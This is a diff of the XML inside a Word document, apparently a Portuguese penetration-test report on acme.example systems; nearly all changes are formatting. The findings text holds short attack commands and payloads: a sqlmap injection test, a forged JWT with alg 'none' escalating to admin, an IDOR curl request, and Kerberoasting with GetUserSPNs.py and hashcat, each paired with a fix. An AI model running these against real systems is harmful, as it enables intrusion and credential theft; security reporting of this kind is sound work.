           <w:sz w:val="15"/>
           <w:szCs w:val="15"/>
         </w:rPr>
-        <w:t xml:space="preserve">CVSS 9.4 · CWE-89 · Aplicação Web · Afetado: loja.acme.example</w:t>
+        <w:t>CVSS 9.4 · CWE-89 · Aplicação Web · Afetado: loja.acme.example</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="B91C1C" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="B91C1C"/>
         </w:pBdr>
         <w:spacing w:after="40"/>
         <w:jc w:val="both"/>
@@ -2988,15 +3263,15 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">O parâmetro "q" do endpoint de busca é concatenado diretamente na consulta SQL. A extração inferencial de dados foi confirmada (boolean e time-based), permitindo leitura arbitrária do banco.</w:t>
+        <w:t>O parâmetro "q" do endpoint de busca é concatenado diretamente na consulta SQL. A extração inferencial de dados foi confirmada (boolean e time-based), permitindo leitura arbitrária do banco.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="B91C1C" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="B91C1C"/>
         </w:pBdr>
-        <w:spacing w:after="0" w:before="20"/>
+        <w:spacing w:before="20"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3006,32 +3281,30 @@
           <w:sz w:val="15"/>
           <w:szCs w:val="15"/>
         </w:rPr>
-        <w:t xml:space="preserve">Confirmação de injeção (PoC de leitura, não destrutiva)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:fill="0F172A" w:val="clear"/>
-        <w:spacing w:after="0"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+        <w:t>Confirmação de injeção (PoC de leitura, não destrutiva)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="0F172A"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
           <w:color w:val="E2E8F0"/>
           <w:sz w:val="15"/>
           <w:szCs w:val="15"/>
         </w:rPr>
-        <w:t xml:space="preserve">sqlmap -u "https://loja.acme.example/buscar?q=tenis" \</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:fill="0F172A" w:val="clear"/>
-        <w:spacing w:after="0"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+        <w:t>sqlmap -u "https://loja.acme.example/buscar?q=tenis" \</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="0F172A"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
           <w:color w:val="E2E8F0"/>
           <w:sz w:val="15"/>
           <w:szCs w:val="15"/>
@@ -3041,23 +3314,22 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:shd w:fill="0F172A" w:val="clear"/>
-        <w:spacing w:after="0"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="0F172A"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
           <w:color w:val="E2E8F0"/>
           <w:sz w:val="15"/>
           <w:szCs w:val="15"/>
         </w:rPr>
-        <w:t xml:space="preserve"># parameter 'q' is injectable (boolean-based, time-based)</w:t>
+        <w:t># parameter 'q' is injectable (boolean-based, time-based)</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="B91C1C" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="B91C1C"/>
         </w:pBdr>
         <w:spacing w:before="40"/>
       </w:pPr>
@@ -3077,13 +3349,13 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">Exfiltração potencial de toda a base de dados (clientes, pedidos, hashes de senha).</w:t>
+        <w:t>Exfiltração potencial de toda a base de dados (clientes, pedidos, hashes de senha).</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="B91C1C" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="B91C1C"/>
         </w:pBdr>
         <w:spacing w:after="40"/>
       </w:pPr>
@@ -3103,15 +3375,15 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">Usar consultas parametrizadas/prepared statements e ORM seguro; adicionar WAF como camada defensiva e princípio do menor privilégio no usuário de banco.</w:t>
+        <w:t>Usar consultas parametrizadas/prepared statements e ORM seguro; adicionar WAF como camada defensiva e princípio do menor privilégio no usuário de banco.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="B91C1C" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="B91C1C"/>
         </w:pBdr>
-        <w:spacing w:after="20" w:before="140"/>
+        <w:spacing w:before="140" w:after="20"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3131,13 +3403,13 @@
           <w:sz w:val="16"/>
           <w:szCs w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve">CRÍTICO</w:t>
+        <w:t>CRÍTICO</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="B91C1C" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="B91C1C"/>
         </w:pBdr>
         <w:spacing w:after="40"/>
       </w:pPr>
@@ -3147,13 +3419,13 @@
           <w:sz w:val="15"/>
           <w:szCs w:val="15"/>
         </w:rPr>
-        <w:t xml:space="preserve">CVSS 9.1 · CWE-347 · Aplicação Web · Afetado: api.acme.example</w:t>
+        <w:t>CVSS 9.1 · CWE-347 · Aplicação Web · Afetado: api.acme.example</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="B91C1C" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="B91C1C"/>
         </w:pBdr>
         <w:spacing w:after="40"/>
         <w:jc w:val="both"/>
@@ -3164,15 +3436,15 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">A API aceita tokens JWT com o cabeçalho {"alg":"none"}, ignorando a verificação de assinatura. Um atacante pode forjar tokens arbitrários, assumindo qualquer identidade e elevando privilégios para administrador.</w:t>
+        <w:t>A API aceita tokens JWT com o cabeçalho {"alg":"none"}, ignorando a verificação de assinatura. Um atacante pode forjar tokens arbitrários, assumindo qualquer identidade e elevando privilégios para administrador.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="B91C1C" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="B91C1C"/>
         </w:pBdr>
-        <w:spacing w:after="0" w:before="20"/>
+        <w:spacing w:before="20"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3182,58 +3454,55 @@
           <w:sz w:val="15"/>
           <w:szCs w:val="15"/>
         </w:rPr>
-        <w:t xml:space="preserve">Token forjado (sem assinatura) elevando para role=admin</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:fill="0F172A" w:val="clear"/>
-        <w:spacing w:after="0"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+        <w:t>Token forjado (sem assinatura) elevando para role=admin</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="0F172A"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
           <w:color w:val="E2E8F0"/>
           <w:sz w:val="15"/>
           <w:szCs w:val="15"/>
         </w:rPr>
-        <w:t xml:space="preserve">header  = {"alg":"none","typ":"JWT"}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:fill="0F172A" w:val="clear"/>
-        <w:spacing w:after="0"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+        <w:t>header  = {"alg":"none","typ":"JWT"}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="0F172A"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
           <w:color w:val="E2E8F0"/>
           <w:sz w:val="15"/>
           <w:szCs w:val="15"/>
         </w:rPr>
-        <w:t xml:space="preserve">payload = {"sub":"10231","role":"admin"}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:fill="0F172A" w:val="clear"/>
-        <w:spacing w:after="0"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+        <w:t>payload = {"sub":"10231","role":"admin"}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="0F172A"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
           <w:color w:val="E2E8F0"/>
           <w:sz w:val="15"/>
           <w:szCs w:val="15"/>
         </w:rPr>
-        <w:t xml:space="preserve"># aceito por api.acme.example -&gt; acesso a endpoints administrativos</w:t>
+        <w:t># aceito por api.acme.example -&gt; acesso a endpoints administrativos</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="B91C1C" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="B91C1C"/>
         </w:pBdr>
         <w:spacing w:before="40"/>
       </w:pPr>
@@ -3253,13 +3522,13 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">Acesso administrativo completo à API, incluindo dados de todos os clientes e operações privilegiadas.</w:t>
+        <w:t>Acesso administrativo completo à API, incluindo dados de todos os clientes e operações privilegiadas.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="B91C1C" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="B91C1C"/>
         </w:pBdr>
         <w:spacing w:after="40"/>
       </w:pPr>
@@ -3279,15 +3548,15 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">Fixar o algoritmo esperado (ex.: RS256) no verificador e rejeitar explicitamente "none"; rotacionar segredos e invalidar sessões emitidas.</w:t>
+        <w:t>Fixar o algoritmo esperado (ex.: RS256) no verificador e rejeitar explicitamente "none"; rotacionar segredos e invalidar sessões emitidas.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="EA580C" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="EA580C"/>
         </w:pBdr>
-        <w:spacing w:after="20" w:before="140"/>
+        <w:spacing w:before="140" w:after="20"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3307,13 +3576,13 @@
           <w:sz w:val="16"/>
           <w:szCs w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve">ALTO</w:t>
+        <w:t>ALTO</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="EA580C" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="EA580C"/>
         </w:pBdr>
         <w:spacing w:after="40"/>
       </w:pPr>
@@ -3323,13 +3592,13 @@
           <w:sz w:val="15"/>
           <w:szCs w:val="15"/>
         </w:rPr>
-        <w:t xml:space="preserve">CVSS 8.1 · CWE-639 · API · Afetado: api.acme.example</w:t>
+        <w:t>CVSS 8.1 · CWE-639 · API · Afetado: api.acme.example</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="EA580C" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="EA580C"/>
         </w:pBdr>
         <w:spacing w:after="40"/>
         <w:jc w:val="both"/>
@@ -3340,15 +3609,15 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">Um usuário autenticado lê pedidos de outros clientes apenas alterando o identificador, sem verificação de propriedade no servidor (Broken Object Level Authorization).</w:t>
+        <w:t>Um usuário autenticado lê pedidos de outros clientes apenas alterando o identificador, sem verificação de propriedade no servidor (Broken Object Level Authorization).</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="EA580C" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="EA580C"/>
         </w:pBdr>
-        <w:spacing w:after="0" w:before="20"/>
+        <w:spacing w:before="20"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3358,32 +3627,30 @@
           <w:sz w:val="15"/>
           <w:szCs w:val="15"/>
         </w:rPr>
-        <w:t xml:space="preserve">Acesso ao pedido de outro cliente trocando o id</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:fill="0F172A" w:val="clear"/>
-        <w:spacing w:after="0"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+        <w:t>Acesso ao pedido de outro cliente trocando o id</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="0F172A"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
           <w:color w:val="E2E8F0"/>
           <w:sz w:val="15"/>
           <w:szCs w:val="15"/>
         </w:rPr>
-        <w:t xml:space="preserve">curl -s https://api.acme.example/api/v1/orders/10232 \</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:fill="0F172A" w:val="clear"/>
-        <w:spacing w:after="0"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+        <w:t>curl -s https://api.acme.example/api/v1/orders/10232 \</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="0F172A"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
           <w:color w:val="E2E8F0"/>
           <w:sz w:val="15"/>
           <w:szCs w:val="15"/>
@@ -3393,23 +3660,22 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:shd w:fill="0F172A" w:val="clear"/>
-        <w:spacing w:after="0"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="0F172A"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
           <w:color w:val="E2E8F0"/>
           <w:sz w:val="15"/>
           <w:szCs w:val="15"/>
         </w:rPr>
-        <w:t xml:space="preserve"># -&gt; retorna PII de cliente DISTINTO</w:t>
+        <w:t># -&gt; retorna PII de cliente DISTINTO</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="EA580C" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="EA580C"/>
         </w:pBdr>
         <w:spacing w:before="40"/>
       </w:pPr>
@@ -3429,13 +3695,13 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">Exposição de PII e histórico de compras de toda a base de clientes.</w:t>
+        <w:t>Exposição de PII e histórico de compras de toda a base de clientes.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="EA580C" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="EA580C"/>
         </w:pBdr>
         <w:spacing w:after="40"/>
       </w:pPr>
@@ -3455,15 +3721,15 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">Validar a propriedade do objeto no servidor (order.customer_id == session.user_id) e usar referências indiretas por usuário; incluir testes de autorização por objeto.</w:t>
+        <w:t>Validar a propriedade do objeto no servidor (order.customer_id == session.user_id) e usar referências indiretas por usuário; incluir testes de autorização por objeto.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="EA580C" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="EA580C"/>
         </w:pBdr>
-        <w:spacing w:after="20" w:before="140"/>
+        <w:spacing w:before="140" w:after="20"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3483,13 +3749,13 @@
           <w:sz w:val="16"/>
           <w:szCs w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve">ALTO</w:t>
+        <w:t>ALTO</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="EA580C" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="EA580C"/>
         </w:pBdr>
         <w:spacing w:after="40"/>
       </w:pPr>
@@ -3499,13 +3765,13 @@
           <w:sz w:val="15"/>
           <w:szCs w:val="15"/>
         </w:rPr>
-        <w:t xml:space="preserve">CVSS 8.0 · MITRE T1558.003 · Active Directory · Afetado: DC01 (10.20.10.5)</w:t>
+        <w:t>CVSS 8.0 · MITRE T1558.003 · Active Directory · Afetado: DC01 (10.20.10.5)</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="EA580C" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="EA580C"/>
         </w:pBdr>
         <w:spacing w:after="40"/>
         <w:jc w:val="both"/>
@@ -3516,15 +3782,15 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">A conta de serviço svc_sql possui SPN e senha fraca, permitindo solicitar um ticket TGS e quebrar o hash offline, resultando em credenciais privilegiadas no domínio.</w:t>
+        <w:t>A conta de serviço svc_sql possui SPN e senha fraca, permitindo solicitar um ticket TGS e quebrar o hash offline, resultando em credenciais privilegiadas no domínio.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="EA580C" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="EA580C"/>
         </w:pBdr>
-        <w:spacing w:after="0" w:before="20"/>
+        <w:spacing w:before="20"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3534,43 +3800,41 @@
           <w:sz w:val="15"/>
           <w:szCs w:val="15"/>
         </w:rPr>
-        <w:t xml:space="preserve">Extração e quebra offline do hash de serviço</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:fill="0F172A" w:val="clear"/>
-        <w:spacing w:after="0"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+        <w:t>Extração e quebra offline do hash de serviço</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="0F172A"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
           <w:color w:val="E2E8F0"/>
           <w:sz w:val="15"/>
           <w:szCs w:val="15"/>
         </w:rPr>
-        <w:t xml:space="preserve">GetUserSPNs.py acme.example/teste:'&lt;senha-lab&gt;' -dc-ip 10.20.10.5 -request</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:fill="0F172A" w:val="clear"/>
-        <w:spacing w:after="0"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+        <w:t>GetUserSPNs.py acme.example/teste:'&lt;senha-lab&gt;' -dc-ip 10.20.10.5 -request</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="0F172A"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
           <w:color w:val="E2E8F0"/>
           <w:sz w:val="15"/>
           <w:szCs w:val="15"/>
         </w:rPr>
-        <w:t xml:space="preserve">hashcat -m 13100 svc_sql.hash rockyou.txt   # senha recuperada offline</w:t>
+        <w:t>hashcat -m 13100 svc_sql.hash rockyou.txt   # senha recuperada offline</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="EA580C" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="EA580C"/>
         </w:pBdr>
         <w:spacing w:before="40"/>
       </w:pPr>
@@ -3590,13 +3854,13 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">Movimentação lateral e elevação para conta privilegiada do domínio de teste.</w:t>
+        <w:t>Movimentação lateral e elevação para conta privilegiada do domínio de teste.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="EA580C" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="EA580C"/>
         </w:pBdr>
         <w:spacing w:after="40"/>
       </w:pPr>
@@ -3616,15 +3880,15 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">Adotar gMSA ou senhas longas/aleatórias para contas de serviço; monitorar solicitações TGS-REQ anômalas e remover SPNs desnecessários.</w:t>
+        <w:t>Adotar gMSA ou senhas longas/aleatórias para contas de serviço; monitorar solicitações TGS-REQ anômalas e remover SPNs desnecessários.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="D97706" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="D97706"/>
         </w:pBdr>
-        <w:spacing w:after="20" w:before="140"/>
+        <w:spacing w:before="140" w:after="20"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3644,13 +3908,13 @@
           <w:sz w:val="16"/>
           <w:szCs w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve">MÉDIO</w:t>
+        <w:t>MÉDIO</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="D97706" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="D97706"/>
         </w:pBdr>
         <w:spacing w:after="40"/>
       </w:pPr>
@@ -3660,13 +3924,13 @@
           <w:sz w:val="15"/>
           <w:szCs w:val="15"/>
         </w:rPr>
-        <w:t xml:space="preserve">CVSS 6.5 · CWE-308 · Rede · Afetado: vpn.acme.example</w:t>
+        <w:t>CVSS 6.5 · CWE-308 · Rede · Afetado: vpn.acme.example</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="D97706" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="D97706"/>
         </w:pBdr>
         <w:spacing w:after="40"/>
         <w:jc w:val="both"/>
@@ -3677,13 +3941,13 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">O acesso remoto via VPN depende apenas de usuário e senha, sem segundo fator, ampliando o impacto de credenciais vazadas.</w:t>
+        <w:t>O acesso remoto via VPN depende apenas de usuário e senha, sem segundo fator, ampliando o impacto de credenciais vazadas.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="D97706" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="D97706"/>
         </w:pBdr>
         <w:spacing w:before="40"/>
       </w:pPr>
@@ -3695,6 +3959,7 @@
           <w:sz w:val="17"/>
           <w:szCs w:val="17"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Impacto: </w:t>
       </w:r>
       <w:r>
@@ -3703,13 +3968,13 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">Acesso inicial à rede interna a partir de credenciais comprometidas.</w:t>
+        <w:t>Acesso inicial à rede interna a partir de credenciais comprometidas.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="D97706" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="D97706"/>
         </w:pBdr>
         <w:spacing w:after="40"/>
       </w:pPr>
@@ -3729,15 +3994,15 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">Exigir MFA resistente a phishing (FIDO2/WebAuthn) no acesso remoto.</w:t>
+        <w:t>Exigir MFA resistente a phishing (FIDO2/WebAuthn) no acesso remoto.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="D97706" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="D97706"/>
         </w:pBdr>
-        <w:spacing w:after="20" w:before="140"/>
+        <w:spacing w:before="140" w:after="20"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3757,13 +4022,13 @@
           <w:sz w:val="16"/>
           <w:szCs w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve">MÉDIO</w:t>
+        <w:t>MÉDIO</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="D97706" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="D97706"/>
         </w:pBdr>
         <w:spacing w:after="40"/>
       </w:pPr>
@@ -3773,13 +4038,13 @@
           <w:sz w:val="15"/>
           <w:szCs w:val="15"/>
         </w:rPr>
-        <w:t xml:space="preserve">CVSS 6.1 · CWE-79 · Aplicação Web · Afetado: loja.acme.example</w:t>
+        <w:t>CVSS 6.1 · CWE-79 · Aplicação Web · Afetado: loja.acme.example</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:left w:val="single" w:color="D97706" w:sz="24" w:space="8"/>
+          <w:left w:val="single" w:sz="24" w:space="8" w:color="D97706"/>
         </w:pBdr>
         <w:spacing w:after="40"/>
         <w:jc w:val="both"/>
@@ -3790,15 +4055,15 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">Payloads persistem no campo de comentário de avaliação e executam no contexto de outros usuários, permitindo roubo de sessão e ações em nome da vítima.</w:t>
